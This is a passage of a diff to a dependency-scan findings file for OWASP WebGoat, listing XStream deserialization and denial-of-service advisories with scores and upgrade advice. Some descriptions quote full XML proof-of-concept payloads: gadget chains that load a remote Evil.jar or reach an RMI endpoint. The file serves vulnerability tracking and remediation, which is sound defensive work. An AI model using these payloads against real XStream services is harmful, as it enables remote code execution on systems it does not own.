class='java.net.URLClassLoader'\u003e\r\n                  \u003cucp class='sun.misc.URLClassPath'\u003e\r\n                    \u003curls serialization='custom'\u003e\r\n                      \u003cunserializable-parents/\u003e\r\n                      \u003cvector\u003e\r\n                        \u003cdefault\u003e\r\n                          \u003ccapacityIncrement\u003e0\u003c/capacityIncrement\u003e\r\n                          \u003celementCount\u003e1\u003c/elementCount\u003e\r\n                          \u003celementData\u003e\r\n                            \u003curl\u003ehttp://127.0.0.1:80/Evil.jar\u003c/url\u003e\r\n                          \u003c/elementData\u003e\r\n                        \u003c/default\u003e\r\n                      \u003c/vector\u003e\r\n                    \u003c/urls\u003e\r\n                    \u003cpath\u003e\r\n                      \u003curl\u003ehttp://127.0.0.1:80/Evil.jar\u003c/url\u003e\r\n                    \u003c/path\u003e\r\n                    \u003cloaders/\u003e\r\n                    \u003clmap/\u003e\r\n                  \u003c/ucp\u003e\r\n                  \u003cpackage2certs class='concurrent-hash-map'/\u003e\r\n                  \u003cclasses/\u003e\r\n                  \u003cdefaultDomain\u003e\r\n                    \u003cclassloader class='java.net.URLClassLoader' reference='../..'/\u003e\r\n                    \u003cprincipals/\u003e\r\n                    \u003chasAllPerm\u003efalse\u003c/hasAllPerm\u003e\r\n                    \u003cstaticPermissions\u003efalse\u003c/staticPermissions\u003e\r\n                    \u003ckey\u003e\r\n                      \u003couter-class reference='../..'/\u003e\r\n                    \u003c/key\u003e\r\n                  \u003c/defaultDomain\u003e\r\n                  \u003cinitialized\u003etrue\u003c/initialized\u003e\r\n                  \u003cpdcache/\u003e\r\n                \u003c/processorCL\u003e\r\n              \u003c/iterator\u003e\r\n              \u003ctype\u003eKEYS\u003c/type\u003e\r\n            \u003c/e\u003e\r\n            \u003cin class='java.io.ByteArrayInputStream'\u003e\r\n              \u003cbuf\u003e\u003c/buf\u003e\r\n              \u003cpos\u003e-2147483648\u003c/pos\u003e\r\n              \u003cmark\u003e0\u003c/mark\u003e\r\n              \u003ccount\u003e0\u003c/count\u003e\r\n            \u003c/in\u003e\r\n          \u003c/is\u003e\r\n          \u003cconsumed\u003efalse\u003c/consumed\u003e\r\n        \u003c/dataSource\u003e\r\n        \u003ctransferFlavors/\u003e\r\n      \u003c/dataHandler\u003e\r\n      \u003cdataLen\u003e0\u003c/dataLen\u003e\r\n    \u003c/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -13976,7 +1214,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "00000035-0000-4000-8000-000000000035",
+          "key": "00000000-0000-0000-0000-000000000007",
           "locations": [
             {
               "package": {
@@ -13987,18 +1225,115 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 157
-            }
-          },
+          "problems": [
+            { "id": "CVE-2021-21347", "source": "cve" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.16)"],
+              "created_at": "2021-03-23T12:55:55.330773Z",
+              "credits": ["threedr3am"],
+              "cvss_base_score": 6.1,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 6.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T14:05:18.441839Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 9.8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:16.132491Z",
+                  "severity": "critical",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:48.665066Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:10.62708Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N/E:P",
+              "disclosed_at": "2021-03-23T12:43:32Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.85802",
+                "probability": "0.02891"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088332",
+              "initially_fixed_in_versions": ["1.4.16"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:48.665066Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-03-23T17:13:22.228057Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-21347.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "http://x-stream.github.io/changes.html%231.4.16"
+                },
+                {
+                  "title": "XStream Workaround",
+                  "url": "https://x-stream.github.io/security.html%23workaround"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-502", "source": "cwe" },
+            { "id": "GHSA-qpfq-ph7r-qv6f", "source": "ghsa" },
+            { "id": "CWE-94", "source": "cwe" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 162 } },
           "title": "Deserialization of Untrusted Data"
         },
-        "id": "00000035-0000-4000-8000-000000000035",
+        "id": "00000000-0000-0000-0000-000000000007",
         "links": {},
         "relationships": {
           "fix": {
@@ -14012,7 +1347,7 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
@@ -14025,7 +1360,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000035-0000-4000-8000-000000000035",
+              "id": "00000000-0000-0000-0000-000000000007",
               "type": "fixes"
             }
           }
@@ -14035,62 +1370,142 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[ch.qos.logback:logback-core](https://mvnrepository.com/artifact/ch.qos.logback/logback-core) is a logback-core module.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') via the `logback receiver` component. An attacker can mount a denial-of-service attack by sending poisoned data.\r\n\r\n**Note:**\r\n\r\nSuccessful exploitation requires the logback-receiver component being enabled and also reachable by the attacker.\n## Remediation\nUpgrade `ch.qos.logback:logback-core` to version 1.2.13, 1.3.14, 1.4.14 or higher.\n## References\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/7018a3609c7bcc9dc7bf5903509901a986e5f578)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/bb095154be011267b64e37a1d401546e7cc2b7c3)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/c612b2fa3caf6eef3c75f1cd5859438451d0fd6f)\n- [Release Notes](https://logback.qos.ch/news.html#1.2.13)\n- [Release Notes](https://logback.qos.ch/news.html#1.3.14)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.\r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'\u003e\r\n        \u003cindexMap class='com.sun.xml.internal.ws.client.ResponseContext'\u003e\r\n          \u003cpacket\u003e\r\n            \u003cmessage class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'\u003e\r\n              \u003cdataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'\u003e\r\n                \u003cbridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'\u003e\r\n                  \u003cbridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'\u003e\r\n                    \u003cbi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'\u003e\r\n                      \u003cjaxbType\u003ecom.sun.rowset.JdbcRowSetImpl\u003c/jaxbType\u003e\r\n                      \u003curiProperties/\u003e\r\n                      \u003cattributeProperties/\u003e\r\n                      \u003cinheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'\u003e\r\n                        \u003cgetter\u003e\r\n                          \u003cclass\u003ecom.sun.rowset.JdbcRowSetImpl\u003c/class\u003e\r\n                          \u003cname\u003egetDatabaseMetaData\u003c/name\u003e\r\n                          \u003cparameter-types/\u003e\r\n                        \u003c/getter\u003e\r\n                      \u003c/inheritedAttWildcard\u003e\r\n                    \u003c/bi\u003e\r\n                    \u003ctagName/\u003e\r\n                    \u003ccontext\u003e\r\n                      \u003cmarshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'\u003e\r\n                        \u003couter-class reference='../..'/\u003e\r\n                      \u003c/marshallerPool\u003e\r\n                      \u003cnameList\u003e\r\n                        \u003cnsUriCannotBeDefaulted\u003e\r\n                          \u003cboolean\u003etrue\u003c/boolean\u003e\r\n                        \u003c/nsUriCannotBeDefaulted\u003e\r\n                        \u003cnamespaceURIs\u003e\r\n                          \u003cstring\u003e1\u003c/string\u003e\r\n                        \u003c/namespaceURIs\u003e\r\n                        \u003clocalNames\u003e\r\n                          \u003cstring\u003eUTF-8\u003c/string\u003e\r\n                        \u003c/localNames\u003e\r\n                      \u003c/nameList\u003e\r\n                    \u003c/context\u003e\r\n                  \u003c/bridge\u003e\r\n                \u003c/bridge\u003e\r\n                \u003cjaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'\u003e\r\n                  \u003cjavax.sql.rowset.BaseRowSet\u003e\r\n                    \u003cdefault\u003e\r\n                      \u003cconcurrency\u003e1008\u003c/concurrency\u003e\r\n                      \u003cescapeProcessing\u003etrue\u003c/escapeProcessing\u003e\r\n                      \u003cfetchDir\u003e1000\u003c/fetchDir\u003e\r\n                      \u003cfetchSize\u003e0\u003c/fetchSize\u003e\r\n                      \u003cisolation\u003e2\u003c/isolation\u003e\r\n                      \u003cmaxFieldSize\u003e0\u003c/maxFieldSize\u003e\r\n                      \u003cmaxRows\u003e0\u003c/maxRows\u003e\r\n                      \u003cqueryTimeout\u003e0\u003c/queryTimeout\u003e\r\n                      \u003creadOnly\u003etrue\u003c/readOnly\u003e\r\n                      \u003crowSetType\u003e1004\u003c/rowSetType\u003e\r\n                      \u003cshowDeleted\u003efalse\u003c/showDeleted\u003e\r\n                      \u003cdataSource\u003ermi://localhost:15000/CallRemoteMethod\u003c/dataSource\u003e\r\n                      \u003cparams/\u003e\r\n                    \u003c/default\u003e\r\n                  \u003c/javax.sql.rowset.BaseRowSet\u003e\r\n                  \u003ccom.sun.rowset.JdbcRowSetImpl\u003e\r\n                    \u003cdefault\u003e\r\n                      \u003ciMatchColumns\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                        \u003cint\u003e-1\u003c/int\u003e\r\n                      \u003c/iMatchColumns\u003e\r\n                      \u003cstrMatchColumns\u003e\r\n                        \u003cstring\u003efoo\u003c/string\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                        \u003cnull/\u003e\r\n                      \u003c/strMatchColumns\u003e\r\n                    \u003c/default\u003e\r\n                  \u003c/com.sun.rowset.JdbcRowSetImpl\u003e\r\n                \u003c/jaxbObject\u003e\r\n              \u003c/dataSource\u003e\r\n            \u003c/message\u003e\r\n            \u003csatellites/\u003e\r\n            \u003cinvocationProperties/\u003e\r\n          \u003c/packet\u003e\r\n        \u003c/indexMap\u003e\r\n      \u003c/comparator\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/sec",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-validation",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-logging",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "ch.qos.logback:logback-classic",
-                  "version": "1.4.11"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "ch.qos.logback:logback-core",
-                  "version": "1.4.11"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000036-0000-4000-8000-000000000036",
+          "key": "00000000-0000-0000-0000-000000000008",
           "locations": [
             {
               "package": {
-                "name": "ch.qos.logback:logback-core",
-                "version": "1.4.11"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 80
-            }
-          },
-          "title": "Uncontrolled Resource Consumption ('Resource Exhaustion')"
+          "problems": [
+            { "id": "CVE-2021-21344", "source": "cve" },
+            { "id": "CWE-502", "source": "cwe" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.16)"],
+              "created_at": "2021-03-23T12:30:28.51941Z",
+              "credits": ["Liaogui Zhong"],
+              "cvss_base_score": 5.3,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 5.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:59:45.305008Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 9.8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:44:28.236284Z",
+                  "severity": "critical",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 7.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:55.587066Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 7.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:07.624866Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P",
+              "disclosed_at": "2021-03-23T12:10:02Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.96236",
+                "probability": "0.28061"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088329",
+              "initially_fixed_in_versions": ["1.4.16"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:55.587066Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-03-23T17:13:21.319113Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-21344.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "http://x-stream.github.io/changes.html%231.4.16"
+                },
+                {
+                  "title": "XStream Workaround",
+                  "url": "https://x-stream.github.io/security.html%23workaround"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "GHSA-59jw-jqf4-3wq3", "source": "ghsa" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 196 } },
+          "title": "Deserialization of Untrusted Data"
         },
-        "id": "00000036-0000-4000-8000-000000000036",
+        "id": "00000000-0000-0000-0000-000000000008",
         "links": {},
         "relationships": {
           "fix": {
@@ -14098,33 +1513,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "ch.qos.logback:logback-core",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-validation",
-                          "version": "3.1.7"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter",
-                          "version": "3.1.7"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework.boot:spring-boot-starter-logging",
-                          "version": "3.1.7"
-                        },
-                        {
-                          "name": "ch.qos.logback:logback-classic",
-                          "version": "1.4.14"
-                        },
-                        {
-                          "name": "ch.qos.logback:logback-core",
-                          "version": "1.4.14"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.16"
                         }
                       ],
                       "is_drop": false
@@ -14133,7 +1532,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000036-0000-4000-8000-000000000036",
+              "id": "00000000-0000-0000-0000-000000000008",
               "type": "fixes"
             }
           }
@@ -14143,50 +1542,138 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling (MadeYouReset) through malformed client requests that trigger repeated server-side stream resets without incrementing abuse counters. An attacker can exhaust server resources by sending specially crafted HTTP/2 requests that cause excessive workload through repeated stream aborts.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.3.20.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/1d013b28395cffe5d2c8ba8f6fe767242bee0962)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/39fcfbeb479acca9aaa94190c1877d632c5ac00e)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/46108066c6b04bda57505290971023e5e83ac9ed)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/afbd244df47f07c5816f029cc9e50ea99f159f01)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2392306)\n- [Vulnerability Research](https://www.imperva.com/blog/madeyoureset-turning-http-2-server-against-itself/)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream and replace or inject objects, that result in exponential recursively hashcode calculation,\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.19 or higher.\n## References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/e8e88621ba1c85ac3b8620337dd672e0c0c3a846)\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-43859.html)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-starter-undertow",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "io.undertow:undertow-core",
-                  "version": "2.3.10.Final"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000037-0000-4000-8000-000000000037",
+          "key": "00000000-0000-0000-0000-000000000009",
           "locations": [
             {
               "package": {
-                "name": "io.undertow:undertow-core",
-                "version": "2.3.10.Final"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 110
-            }
-          },
-          "title": "Allocation of Resources Without Limits or Throttling (MadeYouReset)"
+          "problems": [
+            { "id": "CWE-400", "source": "cwe" },
+            { "id": "CVE-2021-43859", "source": "cve" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.19)"],
+              "created_at": "2022-02-01T12:38:13.80583Z",
+              "credits": ["r00t4dm"],
+              "cvss_base_score": 7.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:58:26.65944Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:17.715751Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:50.000449Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 5.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:25.989798Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+              "disclosed_at": "2022-02-01T00:48:15Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.83600",
+                "probability": "0.02139"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "not defined",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "not defined",
+                    "type": "primary"
+                  }
+                ],
+                "sources": []
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-2388977",
+              "initially_fixed_in_versions": ["1.4.19"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:50.000449Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2022-02-01T14:57:29.27203Z",
+              "references": [
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/e8e88621ba1c85ac3b8620337dd672e0c0c3a846"
+                },
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-43859.html"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "GHSA-rmr5-cpv2-vgjf", "source": "ghsa" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 138 } },
+          "title": "Denial of Service (DoS)"
         },
-        "id": "00000037-0000-4000-8000-000000000037",
+        "id": "00000000-0000-0000-0000-000000000009",
         "links": {},
         "relationships": {
           "fix": {
@@ -14194,21 +1681,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "io.undertow:undertow-core",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework.boot:spring-boot-starter-undertow",
